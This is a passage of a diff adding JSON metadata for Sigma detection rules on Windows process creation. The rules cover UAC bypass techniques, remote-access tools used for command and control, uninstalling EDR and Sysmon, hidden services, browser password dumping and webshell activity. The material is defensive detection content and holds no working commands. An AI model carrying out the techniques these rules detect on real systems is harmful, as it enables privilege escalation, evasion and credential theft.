"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "value": "UAC Bypass Using Disk Cleanup" + }, + { + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate use of cmstp.exe utility by legitimate user" + ], + "filename": "proc_creation_win_uac_bypass_cmstp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", + "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002", + "attack.t1218.003" + ] + }, + "uuid": "e66779cc-383e-4224-a3a4-267eeb585c40", + "value": "Bypass UAC via CMSTP" + }, + { + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "value": "UAC Bypass Using Consent and Comctl32 - Process" + }, + { + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_dismhost.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "value": "UAC Bypass Using DismHost" + }, + { + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_eventvwr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/orange_8361/status/1518970259868626944", + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ] + }, + "uuid": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "value": "UAC Bypass Using Event Viewer RecentViews" + }, + { + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate use of fodhelper.exe utility by legitimate user" + ], + "filename": "proc_creation_win_uac_bypass_fodhelper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "7f741dcf-fc22-4759-87b4-9ae8376676a2", + "value": "Bypass UAC via Fodhelper.exe" + }, + { + "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", + "value": "UAC Bypass via Windows Firewall Snap-In Hijack" + }, + { + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_icmluautil.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "value": "UAC Bypass via ICMLuaUtil" + }, + { + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/IDiagnosticProfileUAC", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "4cbef972-f347-4170-b62a-8253f6168e6d", + "value": "UAC Bypass Using IDiagnostic Profile" + }, + { + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_ieinstal.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "value": "UAC Bypass Using IEInstal - Process" + }, + { + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "value": "UAC Bypass Using MSConfig Token Modification - Process" + }, + { + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "value": "UAC Bypass Using NTFS Reparse Point - Process" + }, + { + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "a743ceba-c771-4d75-97eb-8a90f7f4844c", + "value": "UAC Bypass Using PkgMgr and DISM" + }, + { + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_winsat.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "value": "UAC Bypass Abusing Winsat Path Parsing - Process" + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_wmp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "value": "UAC Bypass Using Windows Media Player - Process" + }, + { + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown sub processes of Wsreset.exe" + ], + "filename": "proc_creation_win_uac_bypass_wsreset.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", + "https://www.activecyber.us/activelabs/windows-uac-bypass", + "https://twitter.com/ReaQta/status/1222548288731217921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "value": "Bypass UAC via WSReset.exe" + }, + { + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", + "https://github.com/hfiref0x/UACME", + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "89a9a0e0-f61a-42e5-8957-b1479565a658", + "value": "UAC Bypass WSReset" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/09/25", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_ultraviewer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultraviewer.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "88656cec-6c3b-487c-82c0-f73ebb805503", + "value": "Use of UltraViewer Remote Access Software" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", + "meta": { + "author": "frack113", + "creation_date": "2022/10/02", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_ultravnc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "145322e4-0fd3-486b-81ca-9addc75736d8", + "value": "Use of UltraVNC Remote Access Software" + }, + { + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "meta": { + "author": "frack113", + "creation_date": "2021/07/12", + "falsepositive": [ + "Uninstall by admin" + ], + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "f0f7be61-9cf5-43be-9836-99d6ef448a18", + "value": "Uninstall Crowdstrike Falcon" + }, + { + "description": "Detects the uninstallation of Sysinternals Sysmon, which could be the result of legitimate administration or a manipulation for defense evasion", + "meta": { + "author": "frack113", + "creation_date": "2022/01/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uninstall_sysmon.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_sysmon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "value": "Uninstall Sysinternals Sysmon" + }, + { + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_unusual_child_process_of_dns_exe.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_child_process_of_dns_exe.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ] + }, + "uuid": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "value": "Unusual Child Porcess of dns.exe" + }, + { + "description": "Detects suspicious parent process for cmd.exe", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_unusual_parent_for_cmd.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_parent_for_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", + "value": "Unusual Parent Process for cmd.exe" + }, + { + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "filename": "proc_creation_win_user_discovery_get_aduser.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "value": "User Discovery And Export Via Get-ADUser Cmdlet" + }, + { + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "meta": { + "author": "Teymur Kheirkhabarov", + "creation_date": "2019/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://pentestlab.blog/2017/03/30/weak-service-permissions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "value": "Possible Privilege Escalation via Weak Service Permissions" + }, + { + "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/12/20", + "falsepositive": [ + "Rare intended use of hidden services" + ], + "filename": "proc_creation_win_using_sc_to_hide_sevices.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "value": "Abuse of Service Permissions to Hide Services in Tools" + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/17", + "falsepositive": [ + "Rare intended use of hidden services" + ], + "filename": "proc_creation_win_using_set_service_to_hide_services.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "value": "Abuse of Service Permissions to Hide Services Via Set-Service" + }, + { + "description": "Detects when verclsid.exe is used to run COM object via GUID", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_verclsid_runs_com.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", + "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "d06be4b9-8045-428b-a567-740a26d9db25", + "value": "Verclsid.exe Runs COM Object" + }, + { + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "meta": { + "author": "behops, Bhabesh Raj", + "creation_date": "2021/10/08", + "falsepositive": [ + "Legitimate use by administrator" + ], + "filename": "proc_creation_win_vmtoolsd_susp_child_process.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmtoolsd_susp_child_process.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1059" + ] + }, + "uuid": "5687f942-867b-4578-ade7-1e341c46e99a", + "value": "VMToolsd Suspicious Child Process" + }, + { + "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_vul_java_remote_debugging.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://dzone.com/articles/remote-debugging-java-applications-with-jdwp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml" + ], + "tags": [ + "attack.t1203", + "attack.execution" + ] + }, + "uuid": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "value": "Java Running with Remote Debugging" + }, + { + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "meta": { + "author": "frack113", + "creation_date": "2022/09/25", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_w32tm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md", + "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1124" + ] + }, + "uuid": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "value": "Use of W32tm as Timer" + }, + { + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "395907ee-96e5-4666-af2e-2ca91688e151", + "value": "Wab Execution From Non Default Location" + }, + { + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wab_unusual_parents.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "value": "Wab/Wabmig Unusual Parent Or Child Processes" + }, + { + "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/14", + "falsepositive": [ + "Legitimate usage of the passwords by users via commandline (should be discouraged)", + "Other currently unknown false positives" + ], + "filename": "proc_creation_win_weak_or_abused_passwords.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "value": "Weak or Abused Passwords In CLI" + }, + { + "description": "Detect use of WebBrowserPassView.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_webbrowserpassview.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webbrowserpassview.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ] + }, + "uuid": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "value": "Launch WebBrowserPassView Executable" + }, + { + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "meta": { + "author": "Florian Roth (rule), MSTI (query)", + "creation_date": "2022/10/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_webshell_chopper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" + ] + }, + "uuid": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", + "value": "Chopper Webshell Process Pattern" + }, + { + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "creation_date": "2017/01/01", + "falsepositive": [ + 